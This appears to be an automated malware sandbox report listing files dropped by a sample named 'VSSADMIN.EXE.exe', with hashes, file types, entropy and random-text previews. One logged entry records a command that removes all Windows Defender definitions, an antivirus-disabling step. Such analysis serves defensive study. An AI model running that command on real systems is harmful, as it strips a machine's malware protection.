Malicious:false
Reputation:low
Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.695685570184741
Encrypted:false
SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:A28F7445BB3D064C83EB9DBC98091F76
SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.701757898321461
Encrypted:false
SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:520219000D5681B63804A2D138617B27
SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.688284131239007
Encrypted:false
SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:E8ACCA0F46CBA97FE289855535184C72
SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.69156792375111
Encrypted:false
SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.705615236042988
Encrypted:false
SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:159C7BA9D193731A3AAE589183A63B3F
SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.692693183518806
Encrypted:false
SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:78F042E25B7FAF970F75DFAA81955268
SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.692693183518806
Encrypted:false
SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.687722658485212
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                    MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                    SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                    SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                    SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.688284131239007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                    MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                    SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                    SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                    SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1602
                                                                                                                                                                    Entropy (8bit):5.8119558015996855
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:0EsLIzcw7vC8cw75HUS5z9pLhnoCHpIYZ:c8A+vCZ+5Hp5zVoC+YZ
                                                                                                                                                                    MD5:F8EDFE4F5FEF69E2E357F07DE6BAF982
                                                                                                                                                                    SHA1:53DB922E57EB89FC7BFE1D4F37090B8F1F75FC72
                                                                                                                                                                    SHA-256:235BA90AEFB66ADE3FFF14DC9D7CA9D1CE0AC93F525880E5DAA5E6CB7948FD6A
                                                                                                                                                                    SHA-512:922FCBCC2182C6005515E5E2AF063A0E5013E66B1A5C09AF9C4683B99323CA6113AB7B10300C5CD8278A01909209E707A04DCF6DE05A52772C605B5652344703
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):812939
                                                                                                                                                                    Entropy (8bit):7.945733546303781
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ytgDdlIn/mLVp6ci4DhpqxN19IEhe5jEg:SgDw+VpzNhAxNThe5jEg
                                                                                                                                                                    MD5:7D55DB52B53CE2E6DE849A3EE76AEA9D
                                                                                                                                                                    SHA1:994CB721BE484DCAAE9AC2AC322E229CC127DC18
                                                                                                                                                                    SHA-256:5E9730D5D67A67E377E2603D48313B1873187D2D0873CD2C51A71106DF215B47
                                                                                                                                                                    SHA-512:B711CF6A15856083FE58B16162120A42ABF90D2F1A50D290280B312D2BEDA95AF9422224EAEF56C2ABC12DAAB0E19960F937DAD9D41B4DDD6A3410D18CC0E4B9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):94208
                                                                                                                                                                    Entropy (8bit):1.2861458126645597
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:go1/8dpUXbSzTPJxz6zVucbj8Ewn7PrH944:gS/inRQVucbj8Ewn7b944
                                                                                                                                                                    MD5:13A67FCABA59E4D6CE4CBC1DA50B72A8
                                                                                                                                                                    SHA1:3974D2F90220322108483CEF19601AA09972C3F5
                                                                                                                                                                    SHA-256:7BD3F40AE06D965E1C4E98D8EF2EEB00A18DD93F934ADF9F16BC682B63CD8927
                                                                                                                                                                    SHA-512:A07327C16463A7DF4C76DC2A682E949CF898BBC2211EFA7E4F917E13DE4BB1C0C98923B8827E191BBBC2D42FF976748D3C6C86A8A5080008BD95ABC69DDD374F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):837054
                                                                                                                                                                    Entropy (8bit):7.999754315958805
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:24576:kjiLk+rAjxaslyomBbzTr+/cQ9ZMpIzHfYXcOV:Zk+xZ+/p82HfYX7V
                                                                                                                                                                    MD5:277246F674F7F5CA92F11CB56679291E
                                                                                                                                                                    SHA1:5F89CE754B4875D784E865A53A2DAC94BFC6E930
                                                                                                                                                                    SHA-256:1285B65197E26C96DC1B814D6FE68A3007BC75A5C85AD874540473E7F678386F
                                                                                                                                                                    SHA-512:C98BF5636076288C3F01264BAF6E5125B3A16E7F94C43FE4EF11990E534850E4F19E0CF150ED731150A417D7051699795D433415A29E63D949288CFF710FC686
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):894
                                                                                                                                                                    Entropy (8bit):3.1101137683695295
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q58KRBubdpkoPAGdjrYw36ltEjtk9+MlWlLehW51ICBw36ltEjM:QOaqdmOFdjrX+tEjS+kWResLIf+tEjM
                                                                                                                                                                    MD5:447B5CF55AA0BFA0F093B3AEF76C0F4F
                                                                                                                                                                    SHA1:E63BA6BD7DCFE9BFC2F048AE4684E3037AEBF5FB
                                                                                                                                                                    SHA-256:F91C62FDDA2C8A51A5732862010054DB443C2515435C8EBB20A3CB19451357E6
                                                                                                                                                                    SHA-512:6DFC9C18BC6D5123874AF719EC93C16F015755E8712696381FDF6826DAB07E1045804DB1792712DC9BA56CBE3562FFFEA81C01497F95EF518C9C14CC70F07893
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                     Preview (decoded from UTF-16):
                                                                                                                                                                     MpCmdRun: Command Line: "C:\Program Files\Windows Defender\MpCmdRun.exe"  -RemoveDefinitions -All
                                                                                                                                                                      Start Time: Fri Sep 15 2023 22:16:04
                                                                                                                                                                     MpEnsureProcessMitigationPolicy: hr = 0x1
                                                                                                                                                                     Start: MpRemoveDefinitions(1)
                                                                                                                                                                     MpCmdRun: End Time: Fri Sep 15 2023 22:16:04
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Sep 15 21:41:36 2023, 1st section name ".debug$S"
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1372
                                                                                                                                                                    Entropy (8bit):4.115739601237995
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:H+q9s+fwemB32UDfH3fwKefNshNII+ycuZhNP8qakSG8bPNnqS+d:TwemBmSXoKCNUu1ulla35qSe
                                                                                                                                                                    MD5:A1FCA9BC43A7502622F3A159F88934BA
                                                                                                                                                                    SHA1:922AB3F6DF13F837F630CC850CC279B602736DBC
                                                                                                                                                                    SHA-256:0CC9C6007E1A457065923B1A11022B747C78F80A50A917FB5792BBDDE08C9104
                                                                                                                                                                    SHA-512:0FC7E8D9A113BC86C708A69A244384B071A2662E5B618D914621D95A992E60F9BADC230BCC3DECC1E51218B60BDE86901C5F3D8465C8E7075706E4B8F74ADB38
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):109392
                                                                                                                                                                    Entropy (8bit):6.641929675972235
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                    MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                    SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                    SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                    SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49432
                                                                                                                                                                    Entropy (8bit):7.811739787042456
